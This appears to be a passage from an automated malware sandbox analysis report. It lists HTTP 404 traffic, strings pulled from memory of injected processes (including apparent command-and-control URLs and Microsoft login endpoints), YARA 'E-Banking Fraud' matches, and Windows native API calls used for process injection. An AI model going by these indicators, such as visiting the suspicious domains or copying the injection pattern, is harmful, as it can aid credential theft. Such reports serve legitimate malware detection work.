                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Sat, 11 Jan 2025 00:22:10 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Sat, 11 Jan 2025 00:22:13 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Sat, 11 Jan 2025 00:22:19 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66a5f968-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Sat, 11 Jan 2025 00:22:21 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66a5f968-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Sat, 11 Jan 2025 00:22:24 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66a5f968-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Sat, 11 Jan 2025 00:22:27 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66a5f968-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/8.1.29
                cache-control: no-cache, private
                content-type: text/html; charset=UTF-8
                content-length: 1992
                content-encoding: br
                vary: Accept-Encoding
                date: Sat, 11 Jan 2025 00:22:32 GMT
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/8.1.29
                cache-control: no-cache, private
                content-type: text/html; charset=UTF-8
                content-length: 1992
                content-encoding: br
                vary: Accept-Encoding
                date: Sat, 11 Jan 2025 00:22:35 GMT
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/8.1.29
                cache-control: no-cache, private
                content-type: text/html; charset=UTF-8
                content-length: 1992
                content-encoding: br
                vary: Accept-Encoding
                date: Sat, 11 Jan 2025 00:22:37 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.1.29 | cache-control: no-cache, private | content-type: text/html; charset=UTF-8 | content-length: 6603 | date: Sat, 11 Jan 2025 00:22:40 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 00:23:27 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 00:23:30 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 00:23:33 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 00:23:35 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ysdBLufRFxAq.exe, 00000009.00000002.3937654032.0000000004D14000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.whisperart.net
                Source: ysdBLufRFxAq.exe, 00000009.00000002.3937654032.0000000004D14000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.whisperart.net/rfcw/
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000007.00000002.3938423784.0000000006580000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936711834.000000000489E000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.000000000342E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000007.00000002.3935086502.00000000030CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000007.00000003.2636052578.0000000007FA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000007.00000002.3936711834.0000000004BC2000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.0000000003752000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000007.00000002.3936711834.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000002.3936126173.0000000003A76000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: regini.exe, 00000007.00000003.2647175730.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match File source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_0042C8D3 NtClose,5_2_0042C8D3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2B60 NtClose,LdrInitializeThunk,5_2_015C2B60
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_015C2DF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_015C2C70
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C35C0 NtCreateMutant,LdrInitializeThunk,5_2_015C35C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C4340 NtSetContextThread,5_2_015C4340
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C4650 NtSuspendThread,5_2_015C4650
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2BF0 NtAllocateVirtualMemory,5_2_015C2BF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2BE0 NtQueryValueKey,5_2_015C2BE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2B80 NtQueryInformationFile,5_2_015C2B80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2BA0 NtEnumerateValueKey,5_2_015C2BA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2AD0 NtReadFile,5_2_015C2AD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2AF0 NtWriteFile,5_2_015C2AF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2AB0 NtWaitForSingleObject,5_2_015C2AB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2D10 NtMapViewOfSection,5_2_015C2D10
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2D00 NtSetInformationFile,5_2_015C2D00
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2D30 NtUnmapViewOfSection,5_2_015C2D30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2DD0 NtDelayExecution,5_2_015C2DD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2DB0 NtEnumerateKey,5_2_015C2DB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2C60 NtCreateKey,5_2_015C2C60
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2C00 NtQueryInformationProcess,5_2_015C2C00
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2CC0 NtQueryVirtualMemory,5_2_015C2CC0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2CF0 NtOpenProcess,5_2_015C2CF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2CA0 NtQueryInformationToken,5_2_015C2CA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2F60 NtCreateProcessEx,5_2_015C2F60
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2F30 NtCreateSection,5_2_015C2F30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2FE0 NtCreateFile,5_2_015C2FE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2F90 NtProtectVirtualMemory,5_2_015C2F90
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2FB0 NtResumeThread,5_2_015C2FB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2FA0 NtQuerySection,5_2_015C2FA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2E30 NtWriteVirtualMemory,5_2_015C2E30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2EE0 NtQueueApcThread,5_2_015C2EE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2E80 NtReadVirtualMemory,5_2_015C2E80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C2EA0 NtAdjustPrivilegesToken,5_2_015C2EA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C3010 NtOpenDirectoryObject,5_2_015C3010
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C3090 NtSetValueKey,5_2_015C3090
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C39B0 NtGetContextThread,5_2_015C39B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C3D70 NtOpenThread,5_2_015C3D70
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Code function: 5_2_015C3D10 NtOpenProcessToken,5_2_015C3D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03674340 NtSetContextThread,LdrInitializeThunk,7_2_03674340
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03674650 NtSuspendThread,LdrInitializeThunk,7_2_03674650
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672B60 NtClose,LdrInitializeThunk,7_2_03672B60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03672BE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03672BF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03672BA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672AF0 NtWriteFile,LdrInitializeThunk,7_2_03672AF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672AD0 NtReadFile,LdrInitializeThunk,7_2_03672AD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672F30 NtCreateSection,LdrInitializeThunk,7_2_03672F30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672FE0 NtCreateFile,LdrInitializeThunk,7_2_03672FE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672FB0 NtResumeThread,LdrInitializeThunk,7_2_03672FB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03672EE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03672E80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03672D30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03672D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03672DF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672DD0 NtDelayExecution,LdrInitializeThunk,7_2_03672DD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672C60 NtCreateKey,LdrInitializeThunk,7_2_03672C60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03672C70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03672CA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_036735C0 NtCreateMutant,LdrInitializeThunk,7_2_036735C0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_036739B0 NtGetContextThread,LdrInitializeThunk,7_2_036739B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672B80 NtQueryInformationFile,7_2_03672B80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672AB0 NtWaitForSingleObject,7_2_03672AB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672F60 NtCreateProcessEx,7_2_03672F60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672FA0 NtQuerySection,7_2_03672FA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672F90 NtProtectVirtualMemory,7_2_03672F90
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672E30 NtWriteVirtualMemory,7_2_03672E30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672EA0 NtAdjustPrivilegesToken,7_2_03672EA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672D00 NtSetInformationFile,7_2_03672D00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672DB0 NtEnumerateKey,7_2_03672DB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672C00 NtQueryInformationProcess,7_2_03672C00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672CF0 NtOpenProcess,7_2_03672CF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03672CC0 NtQueryVirtualMemory,7_2_03672CC0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03673010 NtOpenDirectoryObject,7_2_03673010
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03673090 NtSetValueKey,7_2_03673090
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03673D70 NtOpenThread,7_2_03673D70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_03673D10 NtOpenProcessToken,7_2_03673D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02E293F0 NtCreateFile,7_2_02E293F0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02E296E0 NtClose,7_2_02E296E0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02E29640 NtDeleteFile,7_2_02E29640
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02E29550 NtReadFile,7_2_02E29550
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02E29850 NtAllocateVirtualMemory,7_2_02E29850
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_0395F149 NtReadVirtualMemory,7_2_0395F149
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_0395F0E6 NtReadVirtualMemory,7_2_0395F0E6
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_0395F795 NtClose,7_2_0395F795
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580CF25_2_01580CF2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630CB55_2_01630CB5
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01604F405_2_01604F40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01632F305_2_01632F30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B0F305_2_015B0F30
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D2F285_2_015D2F28
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01582FC85_2_01582FC8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159CFE05_2_0159CFE0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160EFA05_2_0160EFA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590E595_2_01590E59
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164EE265_2_0164EE26
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164EEDB5_2_0164EEDB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2E905_2_015A2E90
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164CE935_2_0164CE93
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0165B16B5_2_0165B16B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157F1725_2_0157F172
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C516C5_2_015C516C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159B1B05_2_0159B1B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164F0E05_2_0164F0E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016470E95_2_016470E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015970C05_2_015970C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163F0CC5_2_0163F0CC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157D34C5_2_0157D34C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164132D5_2_0164132D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D739A5_2_015D739A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016312ED5_2_016312ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AB2C05_2_015AB2C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015952A05_2_015952A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016475715_2_01647571
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162D5B05_2_0162D5B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015814605_2_01581460
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164F43F5_2_0164F43F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164F7B05_2_0164F7B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D56305_2_015D5630
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016416CC5_2_016416CC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015999505_2_01599950
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AB9505_2_015AB950
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016259105_2_01625910
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FD8005_2_015FD800
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015938E05_2_015938E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FB765_2_0164FB76
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01605BF05_2_01605BF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015CDBF95_2_015CDBF9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AFB805_2_015AFB80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01603A6C5_2_01603A6C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01647A465_2_01647A46
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FA495_2_0164FA49
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163DAC65_2_0163DAC6
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01631AA35_2_01631AA3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162DAAC5_2_0162DAAC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015D5AA05_2_015D5AA0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01647D735_2_01647D73
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01593D405_2_01593D40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01641D5A5_2_01641D5A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AFDC05_2_015AFDC0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01609C325_2_01609C32
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FCF25_2_0164FCF2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FF095_2_0164FF09
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01591F925_2_01591F92
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164FFB15_2_0164FFB1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01599EB05_2_01599EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036FA3527_2_036FA352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0364E3F07_2_0364E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_037003E67_2_037003E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036E02747_2_036E0274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036C02C07_2_036C02C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036C81587_2_036C8158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036301007_2_03630100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036DA1187_2_036DA118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F81CC7_2_036F81CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036F41A27_2_036F41A2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_037001AA7_2_037001AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_036D20007_2_036D2000
